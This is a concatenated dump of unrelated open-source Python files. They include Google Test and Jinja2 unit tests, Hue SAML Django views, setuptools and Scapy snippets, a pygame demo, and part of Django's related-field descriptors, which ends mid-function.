# other menu than "scan"?
if menuid != "scan":
return [ ]
# only show if DVB-S frontends are available
for slot in nimmgr.nim_slots:
if slot.isCompatible("DVB-S"):
return [(_("Satellite equipment setup"), SecSetupMain, "satellite_equipment_setup", None)]
return [ ]
def Plugins(**kwargs):
if (nimmgr.hasNimType("DVB-S")):
return PluginDescriptor(name=_("Satellite equipment setup"), description=_("Setup your satellite equipment"), where = PluginDescriptor.WHERE_MENU, needsRestart = False, fnc=SecSetupStart)
else:
return []
|
whynoteasy/bosan | refs/heads/master | external/gtest/test/gtest_list_tests_unittest.py | 1898 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for Google Test's --gtest_list_tests flag.
A user can ask Google Test to list all tests by specifying the
--gtest_list_tests flag. This script tests such functionality
by invoking gtest_list_tests_unittest_ (a program written with
Google Test) the command line flags.
"""
__author__ = 'phanna@google.com (Patrick Hanna)'
import gtest_test_utils
import re
# Constants.
# The command line flag for enabling/disabling listing all tests.
LIST_TESTS_FLAG = 'gtest_list_tests'
# Path to the gtest_list_tests_unittest_ program.
EXE_PATH = gtest_test_utils.GetTestExecutablePath('gtest_list_tests_unittest_')
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests
EXPECTED_OUTPUT_NO_FILTER_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
Abc\.
Xyz
Def
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
TypedTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
TypedTest/1\. # TypeParam = int\s*\*
TestA
TestB
TypedTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
My/TypeParamTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
My/TypeParamTest/1\. # TypeParam = int\s*\*
TestA
TestB
My/TypeParamTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
MyInstantiation/ValueParamTest\.
TestA/0 # GetParam\(\) = one line
TestA/1 # GetParam\(\) = two\\nlines
TestA/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
TestB/0 # GetParam\(\) = one line
TestB/1 # GetParam\(\) = two\\nlines
TestB/2 # GetParam\(\) = a very\\nlo{241}\.\.\.
""")
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests and --gtest_filter=Foo*.
EXPECTED_OUTPUT_FILTER_FOO_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
""")
# Utilities.
def Run(args):
"""Runs gtest_list_tests_unittest_ and returns the list of tests printed."""
return gtest_test_utils.Subprocess([EXE_PATH] + args,
capture_stderr=False).output
# The unit test.
class GTestListTestsUnitTest(gtest_test_utils.TestCase):
"""Tests using the --gtest_list_tests flag to list all tests."""
def RunAndVerify(self, flag_value, expected_output_re, other_flag):
"""Runs gtest_list_tests_unittest_ and verifies that it prints
the correct tests.
Args:
flag_value: value of the --gtest_list_tests flag;
None if the flag should not be present.
expected_output_re: regular expression that matches the expected
output after running command;
other_flag: a different flag to be passed to command
along with gtest_list_tests;
None if the flag should not be present.
"""
if flag_value is None:
flag = ''
flag_expression = 'not set'
elif flag_value == '0':
flag = '--%s=0' % LIST_TESTS_FLAG
flag_expression = '0'
else:
flag = '--%s' % LIST_TESTS_FLAG
flag_expression = '1'
args = [flag]
if other_flag is not None:
args += [other_flag]
output = Run(args)
if expected_output_re:
self.assert_(
expected_output_re.match(output),
('when %s is %s, the output of "%s" is "%s",\n'
'which does not match regex "%s"' %
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output,
expected_output_re.pattern)))
else:
self.assert_(
not EXPECTED_OUTPUT_NO_FILTER_RE.match(output),
('when %s is %s, the output of "%s" is "%s"'%
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output)))
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(flag_value=None,
expected_output_re=None,
other_flag=None)
def testFlag(self):
"""Tests using the --gtest_list_tests flag."""
self.RunAndVerify(flag_value='0',
expected_output_re=None,
other_flag=None)
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag=None)
def testOverrideNonFilterFlags(self):
"""Tests that --gtest_list_tests overrides the non-filter flags."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE,
other_flag='--gtest_break_on_failure')
def testWithFilterFlags(self):
"""Tests that --gtest_list_tests takes into account the
--gtest_filter flag."""
self.RunAndVerify(flag_value='1',
expected_output_re=EXPECTED_OUTPUT_FILTER_FOO_RE,
other_flag='--gtest_filter=Foo*')
if __name__ == '__main__':
gtest_test_utils.Main()
|
jjmleiro/hue | refs/heads/master | desktop/libs/libsaml/src/libsaml/views.py | 36 | #!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from djangosaml2.views import login, echo_attributes, metadata,\
assertion_consumer_service, logout_service
try:
from djangosaml2.views import logout_service_post
except ImportError:
# We are on an older version of djangosaml2
logout_service_post = None
import libsaml.conf
__all__ = ['login', 'echo_attributes', 'assertion_consumer_service', 'metadata']
if logout_service_post is None:
_assertion_consumer_service = assertion_consumer_service
@require_POST
@csrf_exempt
def assertion_consumer_service(request, config_loader_path=None, attribute_mapping=None, create_unknown_user=None):
username_source = libsaml.conf.USERNAME_SOURCE.get().lower()
return _assertion_consumer_service(request, config_loader_path, attribute_mapping, create_unknown_user, username_source)
setattr(logout_service, 'login_notrequired', True)
setattr(login, 'login_notrequired', True)
setattr(echo_attributes, 'login_notrequired', True)
setattr(assertion_consumer_service, 'login_notrequired', True)
setattr(metadata, 'login_notrequired', True)
if logout_service_post is not None:
setattr(logout_service_post, 'login_notrequired', True)
|
6WIND/scapy | refs/heads/master | scapy/contrib/automotive/obd/mid/__init__.py | 25 | # This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Andreas Korb <andreas.d.korb@gmail.com>
# Copyright (C) Nils Weiss <nils@we155.de>
# This program is published under a GPLv2 license
# scapy.contrib.status = skip
"""
Package of contrib automotive obd specific modules
that have to be loaded explicitly.
"""
|
amisrs/angular-flask | refs/heads/master | angular_flask/lib/python2.7/site-packages/setuptools/py26compat.py | 320 | """
Compatibility Support for Python 2.6 and earlier
"""
import sys
try:
from urllib.parse import splittag
except ImportError:
from urllib import splittag
def strip_fragment(url):
"""
In `Python 8280 <http://bugs.python.org/issue8280>`_, Python 2.7 and
later was patched to disregard the fragment when making URL requests.
Do the same for Python 2.6 and earlier.
"""
url, fragment = splittag(url)
return url
if sys.version_info >= (2, 7):
strip_fragment = lambda x: x
try:
from importlib import import_module
except ImportError:
def import_module(module_name):
return __import__(module_name, fromlist=['__name__'])
|
shayanb/pycoin | refs/heads/master | tests/__init__.py | 23 |
import unittest
import doctest
import pycoin.tx.script.microcode
def load_tests(loader, tests, ignore):
tests.addTests(doctest.DocTestSuite(pycoin.tx.script.microcode))
return tests
|
thefinn93/CouchPotatoServer | refs/heads/master | libs/jinja2/testsuite/core_tags.py | 90 | # -*- coding: utf-8 -*-
"""
jinja2.testsuite.core_tags
~~~~~~~~~~~~~~~~~~~~~~~~~~
Test the core tags like for and if.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import unittest
from jinja2.testsuite import JinjaTestCase
from jinja2 import Environment, TemplateSyntaxError, UndefinedError, \
DictLoader
env = Environment()
class ForLoopTestCase(JinjaTestCase):
def test_simple(self):
tmpl = env.from_string('{% for item in seq %}{{ item }}{% endfor %}')
assert tmpl.render(seq=range(10)) == '0123456789'
def test_else(self):
tmpl = env.from_string('{% for item in seq %}XXX{% else %}...{% endfor %}')
assert tmpl.render() == '...'
def test_empty_blocks(self):
tmpl = env.from_string('<{% for item in seq %}{% else %}{% endfor %}>')
assert tmpl.render() == '<>'
def test_context_vars(self):
tmpl = env.from_string('''{% for item in seq -%}
{{ loop.index }}|{{ loop.index0 }}|{{ loop.revindex }}|{{
loop.revindex0 }}|{{ loop.first }}|{{ loop.last }}|{{
loop.length }}###{% endfor %}''')
one, two, _ = tmpl.render(seq=[0, 1]).split('###')
(one_index, one_index0, one_revindex, one_revindex0, one_first,
one_last, one_length) = one.split('|')
(two_index, two_index0, two_revindex, two_revindex0, two_first,
two_last, two_length) = two.split('|')
assert int(one_index) == 1 and int(two_index) == 2
assert int(one_index0) == 0 and int(two_index0) == 1
assert int(one_revindex) == 2 and int(two_revindex) == 1
assert int(one_revindex0) == 1 and int(two_revindex0) == 0
assert one_first == 'True' and two_first == 'False'
assert one_last == 'False' and two_last == 'True'
assert one_length == two_length == '2'
def test_cycling(self):
tmpl = env.from_string('''{% for item in seq %}{{
loop.cycle('<1>', '<2>') }}{% endfor %}{%
for item in seq %}{{ loop.cycle(*through) }}{% endfor %}''')
output = tmpl.render(seq=range(4), through=('<1>', '<2>'))
assert output == '<1><2>' * 4
def test_scope(self):
tmpl = env.from_string('{% for item in seq %}{% endfor %}{{ item }}')
output = tmpl.render(seq=range(10))
assert not output
def test_varlen(self):
def inner():
for item in range(5):
yield item
tmpl = env.from_string('{% for item in iter %}{{ item }}{% endfor %}')
output = tmpl.render(iter=inner())
assert output == '01234'
def test_noniter(self):
tmpl = env.from_string('{% for item in none %}...{% endfor %}')
self.assert_raises(TypeError, tmpl.render)
def test_recursive(self):
tmpl = env.from_string('''{% for item in seq recursive -%}
[{{ item.a }}{% if item.b %}<{{ loop(item.b) }}>{% endif %}]
{%- endfor %}''')
assert tmpl.render(seq=[
dict(a=1, b=[dict(a=1), dict(a=2)]),
dict(a=2, b=[dict(a=1), dict(a=2)]),
dict(a=3, b=[dict(a='a')])
]) == '[1<[1][2]>][2<[1][2]>][3<[a]>]'
def test_looploop(self):
tmpl = env.from_string('''{% for row in table %}
{%- set rowloop = loop -%}
{% for cell in row -%}
[{{ rowloop.index }}|{{ loop.index }}]
{%- endfor %}
{%- endfor %}''')
assert tmpl.render(table=['ab', 'cd']) == '[1|1][1|2][2|1][2|2]'
def test_reversed_bug(self):
tmpl = env.from_string('{% for i in items %}{{ i }}'
'{% if not loop.last %}'
',{% endif %}{% endfor %}')
assert tmpl.render(items=reversed([3, 2, 1])) == '1,2,3'
def test_loop_errors(self):
tmpl = env.from_string('''{% for item in [1] if loop.index
== 0 %}...{% endfor %}''')
self.assert_raises(UndefinedError, tmpl.render)
tmpl = env.from_string('''{% for item in [] %}...{% else
%}{{ loop }}{% endfor %}''')
assert tmpl.render() == ''
def test_loop_filter(self):
tmpl = env.from_string('{% for item in range(10) if item '
'is even %}[{{ item }}]{% endfor %}')
assert tmpl.render() == '[0][2][4][6][8]'
tmpl = env.from_string('''
{%- for item in range(10) if item is even %}[{{
loop.index }}:{{ item }}]{% endfor %}''')
assert tmpl.render() == '[1:0][2:2][3:4][4:6][5:8]'
def test_loop_unassignable(self):
self.assert_raises(TemplateSyntaxError, env.from_string,
'{% for loop in seq %}...{% endfor %}')
def test_scoped_special_var(self):
t = env.from_string('{% for s in seq %}[{{ loop.first }}{% for c in s %}'
'|{{ loop.first }}{% endfor %}]{% endfor %}')
assert t.render(seq=('ab', 'cd')) == '[True|True|False][False|True|False]'
def test_scoped_loop_var(self):
t = env.from_string('{% for x in seq %}{{ loop.first }}'
'{% for y in seq %}{% endfor %}{% endfor %}')
assert t.render(seq='ab') == 'TrueFalse'
t = env.from_string('{% for x in seq %}{% for y in seq %}'
'{{ loop.first }}{% endfor %}{% endfor %}')
assert t.render(seq='ab') == 'TrueFalseTrueFalse'
def test_recursive_empty_loop_iter(self):
t = env.from_string('''
{%- for item in foo recursive -%}{%- endfor -%}
''')
assert t.render(dict(foo=[])) == ''
def test_call_in_loop(self):
t = env.from_string('''
{%- macro do_something() -%}
[{{ caller() }}]
{%- endmacro %}
{%- for i in [1, 2, 3] %}
{%- call do_something() -%}
{{ i }}
{%- endcall %}
{%- endfor -%}
''')
assert t.render() == '[1][2][3]'
def test_scoping_bug(self):
t = env.from_string('''
{%- for item in foo %}...{{ item }}...{% endfor %}
{%- macro item(a) %}...{{ a }}...{% endmacro %}
{{- item(2) -}}
''')
assert t.render(foo=(1,)) == '...1......2...'
def test_unpacking(self):
tmpl = env.from_string('{% for a, b, c in [[1, 2, 3]] %}'
'{{ a }}|{{ b }}|{{ c }}{% endfor %}')
assert tmpl.render() == '1|2|3'
class IfConditionTestCase(JinjaTestCase):
def test_simple(self):
tmpl = env.from_string('''{% if true %}...{% endif %}''')
assert tmpl.render() == '...'
def test_elif(self):
tmpl = env.from_string('''{% if false %}XXX{% elif true
%}...{% else %}XXX{% endif %}''')
assert tmpl.render() == '...'
def test_else(self):
tmpl = env.from_string('{% if false %}XXX{% else %}...{% endif %}')
assert tmpl.render() == '...'
def test_empty(self):
tmpl = env.from_string('[{% if true %}{% else %}{% endif %}]')
assert tmpl.render() == '[]'
def test_complete(self):
tmpl = env.from_string('{% if a %}A{% elif b %}B{% elif c == d %}'
'C{% else %}D{% endif %}')
assert tmpl.render(a=0, b=False, c=42, d=42.0) == 'C'
def test_no_scope(self):
tmpl = env.from_string('{% if a %}{% set foo = 1 %}{% endif %}{{ foo }}')
assert tmpl.render(a=True) == '1'
tmpl = env.from_string('{% if true %}{% set foo = 1 %}{% endif %}{{ foo }}')
assert tmpl.render() == '1'
class MacrosTestCase(JinjaTestCase):
env = Environment(trim_blocks=True)
def test_simple(self):
tmpl = self.env.from_string('''\
{% macro say_hello(name) %}Hello {{ name }}!{% endmacro %}
{{ say_hello('Peter') }}''')
assert tmpl.render() == 'Hello Peter!'
def test_scoping(self):
tmpl = self.env.from_string('''\
{% macro level1(data1) %}
{% macro level2(data2) %}{{ data1 }}|{{ data2 }}{% endmacro %}
{{ level2('bar') }}{% endmacro %}
{{ level1('foo') }}''')
assert tmpl.render() == 'foo|bar'
def test_arguments(self):
tmpl = self.env.from_string('''\
{% macro m(a, b, c='c', d='d') %}{{ a }}|{{ b }}|{{ c }}|{{ d }}{% endmacro %}
{{ m() }}|{{ m('a') }}|{{ m('a', 'b') }}|{{ m(1, 2, 3) }}''')
assert tmpl.render() == '||c|d|a||c|d|a|b|c|d|1|2|3|d'
def test_varargs(self):
tmpl = self.env.from_string('''\
{% macro test() %}{{ varargs|join('|') }}{% endmacro %}\
{{ test(1, 2, 3) }}''')
assert tmpl.render() == '1|2|3'
def test_simple_call(self):
tmpl = self.env.from_string('''\
{% macro test() %}[[{{ caller() }}]]{% endmacro %}\
{% call test() %}data{% endcall %}''')
assert tmpl.render() == '[[data]]'
def test_complex_call(self):
tmpl = self.env.from_string('''\
{% macro test() %}[[{{ caller('data') }}]]{% endmacro %}\
{% call(data) test() %}{{ data }}{% endcall %}''')
assert tmpl.render() == '[[data]]'
def test_caller_undefined(self):
tmpl = self.env.from_string('''\
{% set caller = 42 %}\
{% macro test() %}{{ caller is not defined }}{% endmacro %}\
{{ test() }}''')
assert tmpl.render() == 'True'
def test_include(self):
self.env = Environment(loader=DictLoader({'include':
'{% macro test(foo) %}[{{ foo }}]{% endmacro %}'}))
tmpl = self.env.from_string('{% from "include" import test %}{{ test("foo") }}')
assert tmpl.render() == '[foo]'
def test_macro_api(self):
tmpl = self.env.from_string('{% macro foo(a, b) %}{% endmacro %}'
'{% macro bar() %}{{ varargs }}{{ kwargs }}{% endmacro %}'
'{% macro baz() %}{{ caller() }}{% endmacro %}')
assert tmpl.module.foo.arguments == ('a', 'b')
assert tmpl.module.foo.defaults == ()
assert tmpl.module.foo.name == 'foo'
assert not tmpl.module.foo.caller
assert not tmpl.module.foo.catch_kwargs
assert not tmpl.module.foo.catch_varargs
assert tmpl.module.bar.arguments == ()
assert tmpl.module.bar.defaults == ()
assert not tmpl.module.bar.caller
assert tmpl.module.bar.catch_kwargs
assert tmpl.module.bar.catch_varargs
assert tmpl.module.baz.caller
def test_callself(self):
tmpl = self.env.from_string('{% macro foo(x) %}{{ x }}{% if x > 1 %}|'
'{{ foo(x - 1) }}{% endif %}{% endmacro %}'
'{{ foo(5) }}')
assert tmpl.render() == '5|4|3|2|1'
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ForLoopTestCase))
suite.addTest(unittest.makeSuite(IfConditionTestCase))
suite.addTest(unittest.makeSuite(MacrosTestCase))
return suite
|
abhianand7/python_programs | refs/heads/master | pygame_assignment/pygame_02.py | 1 |
import pygame
import sys
from pygame.locals import *
pygame.init()
white = (255,255,255) #defining colour in RGB
black = (0,0,0)
red = (255,0,0)
green = (0,255,0)
blue = (0,0,255)
yellow = (255,255,0)
cyan = (0,255,255)
purpule = (255,0,255)
setDisplay = pygame.display.set_mode((400,300))
singlePixel = pygame.PixelArray(setDisplay) # you can draw each pixel seperately
singlePixel[5][5] = yellow
pygame.display.set_caption('PyGame Tutorial')
while True:
for event in pygame.event.get():
print event
if event.type == QUIT:
pygame.quit()
sys.exit()
pygame.display.update()
|
spawnedc/MeCanBlog | refs/heads/master | django/db/models/fields/related.py | 82 | from django.conf import settings
from django.db import connection, router, transaction, connections
from django.db.backends import util
from django.db.models import signals, get_model
from django.db.models.fields import (AutoField, Field, IntegerField,
PositiveIntegerField, PositiveSmallIntegerField, FieldDoesNotExist)
from django.db.models.related import RelatedObject
from django.db.models.query import QuerySet
from django.db.models.query_utils import QueryWrapper
from django.db.models.deletion import CASCADE
from django.utils.encoding import smart_unicode
from django.utils.translation import (ugettext_lazy as _, string_concat,
ungettext, ugettext)
from django.utils.functional import curry
from django.core import exceptions
from django import forms
RECURSIVE_RELATIONSHIP_CONSTANT = 'self'
pending_lookups = {}
def add_lazy_relation(cls, field, relation, operation):
"""
Adds a lookup on ``cls`` when a related field is defined using a string,
i.e.::
class MyModel(Model):
fk = ForeignKey("AnotherModel")
This string can be:
* RECURSIVE_RELATIONSHIP_CONSTANT (i.e. "self") to indicate a recursive
relation.
* The name of a model (i.e "AnotherModel") to indicate another model in
the same app.
* An app-label and model name (i.e. "someapp.AnotherModel") to indicate
another model in a different app.
If the other model hasn't yet been loaded -- almost a given if you're using
lazy relationships -- then the relation won't be set up until the
class_prepared signal fires at the end of model initialization.
operation is the work that must be performed once the relation can be resolved.
"""
# Check for recursive relations
if relation == RECURSIVE_RELATIONSHIP_CONSTANT:
app_label = cls._meta.app_label
model_name = cls.__name__
else:
# Look for an "app.Model" relation
try:
app_label, model_name = relation.split(".")
except ValueError:
# If we can't split, assume a model in current app
app_label = cls._meta.app_label
model_name = relation
except AttributeError:
# If it doesn't have a split it's actually a model class
app_label = relation._meta.app_label
model_name = relation._meta.object_name
# Try to look up the related model, and if it's already loaded resolve the
# string right away. If get_model returns None, it means that the related
# model isn't loaded yet, so we need to pend the relation until the class
# is prepared.
model = get_model(app_label, model_name, False)
if model:
operation(field, model, cls)
else:
key = (app_label, model_name)
value = (cls, field, operation)
pending_lookups.setdefault(key, []).append(value)
def do_pending_lookups(sender, **kwargs):
"""
Handle any pending relations to the sending model. Sent from class_prepared.
"""
key = (sender._meta.app_label, sender.__name__)
for cls, field, operation in pending_lookups.pop(key, []):
operation(field, sender, cls)
signals.class_prepared.connect(do_pending_lookups)
#HACK
class RelatedField(object):
def contribute_to_class(self, cls, name):
sup = super(RelatedField, self)
# Store the opts for related_query_name()
self.opts = cls._meta
if hasattr(sup, 'contribute_to_class'):
sup.contribute_to_class(cls, name)
if not cls._meta.abstract and self.rel.related_name:
self.rel.related_name = self.rel.related_name % {
'class': cls.__name__.lower(),
'app_label': cls._meta.app_label.lower(),
}
other = self.rel.to
if isinstance(other, basestring) or other._meta.pk is None:
def resolve_related_class(field, model, cls):
field.rel.to = model
field.do_related_class(model, cls)
add_lazy_relation(cls, self, other, resolve_related_class)
else:
self.do_related_class(other, cls)
def set_attributes_from_rel(self):
self.name = self.name or (self.rel.to._meta.object_name.lower() + '_' + self.rel.to._meta.pk.name)
if self.verbose_name is None:
self.verbose_name = self.rel.to._meta.verbose_name
self.rel.field_name = self.rel.field_name or self.rel.to._meta.pk.name
def do_related_class(self, other, cls):
self.set_attributes_from_rel()
self.related = RelatedObject(other, cls, self)
if not cls._meta.abstract:
self.contribute_to_related_class(other, self.related)
def get_prep_lookup(self, lookup_type, value):
if hasattr(value, 'prepare'):
return value.prepare()
if hasattr(value, '_prepare'):
return value._prepare()
# FIXME: lt and gt are explicitly allowed to make
# get_(next/prev)_by_date work; other lookups are not allowed since that
# gets messy pretty quick. This is a good candidate for some refactoring
# in the future.
if lookup_type in ['exact', 'gt', 'lt', 'gte', 'lte']:
return self._pk_trace(value, 'get_prep_lookup', lookup_type)
if lookup_type in ('range', 'in'):
return [self._pk_trace(v, 'get_prep_lookup', lookup_type) for v in value]
elif lookup_type == 'isnull':
return []
raise TypeError("Related Field has invalid lookup: %s" % lookup_type)
def get_db_prep_lookup(self, lookup_type, value, connection, prepared=False):
if not prepared:
value = self.get_prep_lookup(lookup_type, value)
if hasattr(value, 'get_compiler'):
value = value.get_compiler(connection=connection)
if hasattr(value, 'as_sql') or hasattr(value, '_as_sql'):
# If the value has a relabel_aliases method, it will need to
# be invoked before the final SQL is evaluated
if hasattr(value, 'relabel_aliases'):
return value
if hasattr(value, 'as_sql'):
sql, params = value.as_sql()
else:
sql, params = value._as_sql(connection=connection)
return QueryWrapper(('(%s)' % sql), params)
# FIXME: lt and gt are explicitly allowed to make
# get_(next/prev)_by_date work; other lookups are not allowed since that
# gets messy pretty quick. This is a good candidate for some refactoring
# in the future.
if lookup_type in ['exact', 'gt', 'lt', 'gte', 'lte']:
return [self._pk_trace(value, 'get_db_prep_lookup', lookup_type,
connection=connection, prepared=prepared)]
if lookup_type in ('range', 'in'):
return [self._pk_trace(v, 'get_db_prep_lookup', lookup_type,
connection=connection, prepared=prepared)
for v in value]
elif lookup_type == 'isnull':
return []
raise TypeError("Related Field has invalid lookup: %s" % lookup_type)
def _pk_trace(self, value, prep_func, lookup_type, **kwargs):
# Value may be a primary key, or an object held in a relation.
# If it is an object, then we need to get the primary key value for
# that object. In certain conditions (especially one-to-one relations),
# the primary key may itself be an object - so we need to keep drilling
# down until we hit a value that can be used for a comparison.
v = value
# In the case of an FK to 'self', this check allows to_field to be used
# for both forwards and reverse lookups across the FK. (For normal FKs,
# it's only relevant for forward lookups).
if isinstance(v, self.rel.to):
field_name = getattr(self.rel, "field_name", None)
else:
field_name = None
try:
while True:
if field_name is None:
field_name = v._meta.pk.name
v = getattr(v, field_name)
field_name = None
except AttributeError:
pass
except exceptions.ObjectDoesNotExist:
v = None
field = self
while field.rel:
if hasattr(field.rel, 'field_name'):
field = field.rel.to._meta.get_field(field.rel.field_name)
else:
field = field.rel.to._meta.pk
if lookup_type in ('range', 'in'):
v = [v]
v = getattr(field, prep_func)(lookup_type, v, **kwargs)
if isinstance(v, list):
v = v[0]
return v
def related_query_name(self):
# This method defines the name that can be used to identify this
# related object in a table-spanning query. It uses the lower-cased
# object_name by default, but this can be overridden with the
# "related_name" option.
return self.rel.related_name or self.opts.object_name.lower()
class SingleRelatedObjectDescriptor(object):
# This class provides the functionality that makes the related-object
# managers available as attributes on a model class, for fields that have
# a single "remote" value, on the class pointed to by a related field.
# In the example "place.restaurant", the restaurant attribute is a
# SingleRelatedObjectDescriptor instance.
def __init__(self, related):
self.related = related
self.cache_name = related.get_cache_name()
def __get__(self, instance, instance_type=None):
if instance is None:
return self
try:
return getattr(instance, self.cache_name)
except AttributeError:
params = {'%s__pk' % self.related.field.name: instance._get_pk_val()}
db = router.db_for_read(self.related.model, instance=instance)
rel_obj = self.related.model._base_manager.using(db).get(**params)
setattr(instance, self.cache_name, rel_obj)
return rel_obj
def __set__(self, instance, value):
if instance is None:
raise AttributeError("%s must be accessed via instance" % self.related.opts.object_name)
# The similarity of the code below to the code in
# ReverseSingleRelatedObjectDescriptor is annoying, but there's a bunch
# of small differences that would make a common base class convoluted.
# If null=True, we can assign null here, but otherwise the value needs
# to be an instance of the related class.
if value is None and self.related.field.null == False:
raise ValueError('Cannot assign None: "%s.%s" does not allow null values.' %
(instance._meta.object_name, self.related.get_accessor_name()))
elif value is not None and not isinstance(value, self.related.model):
raise ValueError('Cannot assign "%r": "%s.%s" must be a "%s" instance.' %
(value, instance._meta.object_name,
self.related.get_accessor_name(), self.related.opts.object_name))
elif value is not None:
if instance._state.db is None:
instance._state.db = router.db_for_write(instance.__class__, instance=value)
elif value._state.db is None:
value._state.db = router.db_for_write(value.__class__, instance=instance)
elif value._state.db is not None and instance._state.db is not None:
if not router.allow_relation(value, instance):
raise ValueError('Cannot assign "%r": instance is on database "%s", value is on database "%s"' %
(value, instance._state.db, value._state.db))
# Set the value of the related field to the value of the related object's related field
setattr(value, self.related.field.attname, getattr(instance, self.related.field.rel.get_related_field().attname))
# Since we already know what the related object is, seed the related
# object caches now, too. This avoids another db hit if you get the
# object you just set.
setattr(instance, self.cache_name, value)
setattr(value, self.related.field.get_cache_name(), instance)
class ReverseSingleRelatedObjectDescriptor(object):
# This class provides the functionality that makes the related-object
# managers available as attributes on a model class, for fields that have
# a single "remote" value, on the class that defines the related field.
# In the example "choice.poll", the poll attribute is a
# ReverseSingleRelatedObjectDescriptor instance.
def __init__(self, field_with_rel):
self.field = field_with_rel
def __get__(self, instance, instance_type=None):
if instance is None:
return self
cache_name = self.field.get_cache_name()
try:
return getattr(instance, cache_name)
except AttributeError:
val = getattr(instance, self.field.attname)
if val is None:
# If NULL is an allowed value, return it.
if self.field.null:
return None
raise self.field.rel.to.DoesNotExist
other_field = self.field.rel.get_related_field()
if other_field.rel:
params = {'%s__pk' % self.field.rel.field_name: val}
else:
params = {'%s__exact' % self.field.rel.field_name: val}
# If the related manager indicates that it should be used for
# related fields, respect that.
rel_mgr = self.field.rel.to._default_manager
db = router.db_for_read(self.field.rel.to, instance=instance)
if getattr(rel_mgr, 'use_for_related_fields', False):
rel_obj = rel_mgr.using(db).get(**params)
else:
rel_obj = QuerySet(self.field.rel.to).using(db).get(**params)
setattr(instance, cache_name, rel_obj)
return rel_obj
def __set__(self, instance, value):
if instance is None:
raise AttributeError("%s must be accessed via instance" % self._field.name)
# If null=True, we can assign null here, but otherwise the value needs
# to be an instance of the related class.
if value is None and self.field.null == False:
raise ValueError('Cannot assign None: "%s.%s" does not allow null values.' %
(instance._meta.object_name, self.field.name))
elif value is not None and not isinstance(value, self.field.rel.to):
raise ValueError('Cannot assign "%r": "%s.%s" must be a "%s" instance.' %
(value, instance._meta.object_name,
self.field.name, self.field.rel.to._meta.object_name))
elif value is not None:
if instance._state.db is None:
instance._state.db = router.db_for_write(instance.__class__, instance=value)
elif value._state.db is None:
value._state.db = router.db_for_write(value.__class__, instance=instance)
elif value._state.db is not None and instance._state.db is not None:
if not router.allow_relation(value, instance):
raise ValueError('Cannot assign "%r": instance is on database "%s", value is on database "%s"' %
(value, instance._state.db, value._state.db))
# If we're setting the value of a OneToOneField to None, we need to clear
# out the cache on any old related object. Otherwise, deleting the
# previously-related object will also cause this object to be deleted,
# which is wrong.
if value is None:
# Look up the previously-related object, which may still be available
# since we've not yet cleared out the related field.
# Use the cache directly, instead of the accessor; if we haven't
# populated the cache, then we don't care - we're only accessing
# the object to invalidate the accessor cache, so there's no
# need to populate the cache just to expire it again.
related = getattr(instance, self.field.get_cache_name(), None)
# If we've got an old related object, we need to clear out its
# cache. This cache also might not exist if the related object
# hasn't been accessed yet.
if related:
cache_name = self.field.related.get_cache_name()
try:
delattr(related, cache_name)
except AttributeError:
pass
# Set the value of the related field
try:
val = getattr(value, self.field.rel.get_related_field().attname)
except AttributeError:
val = None
